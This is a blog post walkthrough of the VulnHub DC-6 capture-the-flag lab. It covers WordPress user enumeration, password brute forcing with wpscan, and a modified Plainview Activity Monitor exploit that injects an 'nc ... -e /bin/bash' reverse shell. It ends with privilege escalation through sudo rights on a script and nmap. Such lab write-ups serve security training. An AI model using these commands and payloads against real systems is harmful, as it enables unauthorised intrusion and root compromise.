Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


06/12/2024 Shad Hussain Knowledge Views 160 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC6 - VulnHub 

Machine Link : https://www.vulnhub.com/entry/dc-6,315/


STEP1
arp-scan -l
FINDING
192.168.31.132
---------------------------------------------------------------------------------------------------------------
STEP2
nmap 192.168.31.132 -p- -Pn -A -T4 -sSV
FINDING
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
---------------------------------------------------------------------------------------------------------------
STEP3
nano /etc/hosts
192.168.31.132 wordy
ctrl+x
ctrl+y
enter
---------------------------------------------------------------------------------------------------------------
STEP4
wpscan --url http://wordy -e at -e ap -e u
FINDING
User(s) Identified:
admin
mark
graham
sarah
jens
---------------------------------------------------------------------------------------------------------------
STEP5
dirb http://wordy 
FINDING
+ http://wordy/wp-admin/admin.php (CODE:302|SIZE:0)   
---------------------------------------------------------------------------------------------------------------
STEP6
HINT IN THE DC-6 VULNHUB PAGE
cat /usr/share/wordlists/rockyou.txt | grep k01  passwords.txt 
wpscan --url http://wordy/wp-login.php -U /root/Desktop/dc5users.txt -P /root/Desktop/passwords.txt
FINDING
| Username: mark, Password: helpdesk01
---------------------------------------------------------------------------------------------------------------
STEP7
http://wordy/wp-admin/admin.php
Username: mark, Password: helpdesk01
on left menu you will get Activity Monitor
searchsploit activity monitor 
FINDING
Activity Monitor 2002 2.6 - Remote Denial of Service                                 | windows/dos/22690.c
RedHat Linux 6.0/6.1/6.2 - pam_console Monitor Activity After Logout               | linux/local/19900.c
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injec | php/webapps/45274.html
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) ( | php/webapps/50110.py
---------------------------------------------------------------------------------------------------------------
STEP7
https://www.exploit-db.com/exploits/45274

wget https://www.exploit-db.com/download/45274

make some changes in the CRSF exploit as
html
  !--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  --
  body
  scripthistory.pushState(, , /)/script
    form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"
      input type="hidden" name="ip" value="google.fr| nc 192.168.31.28 9999 -e /bin/bash" /
      input type="hidden" name="lookup" value="Lookup" /
      input type="submit" value="Submit request" /
    /form
  /body
/html
---------------------------------------------------------------------------------------------------------------
STEP8
on new terminal
nc -nvlp 9999
open the html exploit and press the button
get revers connection
---------------------------------------------------------------------------------------------------------------
STEP9
python -c import pty; pty.spawn("/bin/bash")
cd /home/mark/stuff
ls -la
cat things-to-do.txt
FINDING
- Add new user: graham - GSo7isUM1D4 - done
we got graham password
su graham
GSo7isUM1D4
---------------------------------------------------------------------------------------------------------------
STEP10
sudo -l
FINDING
(jens) NOPASSWD: /home/jens/backups.sh
---------------------------------------------------------------------------------------------------------------
STEP11
echo /bin/bash  /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
sudo -l
FINDING
(root) NOPASSWD: /usr/bin/nmap
echo "os.execute(/bin/sh)"/tmp/root.nse
sudo nmap --script=/tmp/root.nse
whoami
root
cd /root
ls -la
cat theflag.txt

Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `" 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!
---------------------------------------------------------------------------------------------------------------

Related articles
12.12.2024 Shad Hussain Readers 110
CTF Walk Through - OverlayFS - THM  Room Link : https://tryhackme.com/r/room/overlayfs STEP1 Username: overlay .....
06.12.2024 Manorama Kumari Readers 211
**पति की आवश्यकता क्यों ?* :: 😊😊  एक महिला एक मनोचिकित्सक के पास गई और उससे बोली कि *"मैं शादी नहीं करना चाहती.. .....
05.12.2024 Shad Hussain Readers 171
CTF Walk Through - Ice - THM  Room Link : https://tryhackme.com/r/room/ice STEP1 nmap -Pn -sSV 10.10.98.2 .....
05.12.2024 Shad Hussain Readers 185
CTF Walk Through - LazyAdmin - THM  Room Link : https://tryhackme.com/r/room/lazyadmin STEP1 nmap 10.10.87.228 .....
04.12.2024 Shad Hussain Readers 188
CTF Walk Through - Vulnversity - THM  Room Link : https://tryhackme.com/r/room/vulnversity STEP1 nmap -p- -sSV 10 .....
03.12.2024 Shad Hussain Readers 208
CTF Walk Through - EVM - VulnHub  Machien Link : https://www.vulnhub.com/entry/evm-1,391/ step1 : arp-scan .....
02.12.2024 Shad Hussain Readers 208
CTF Walk Through - DC3 - VulnHub  Machine Link : https://www.vulnhub.com/entry/dc-32,312/ STEP1 nmap 192.168. .....
01.12.2024 Shad Hussain Readers 264
CTF Walk Through - Cybersploit-1 - Vulnhub  machine link : https://www.vulnhub.com/entry/cybersploit-1,506/ step1 : US .....
01.12.2024 Shad Hussain Readers 239
CTF -Walk Through - DeathNote-1 - VulnHub  https://www.vulnhub.com/entry/deathnote-1,739/ STEP1 arp-scan -l -- to get .....
 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved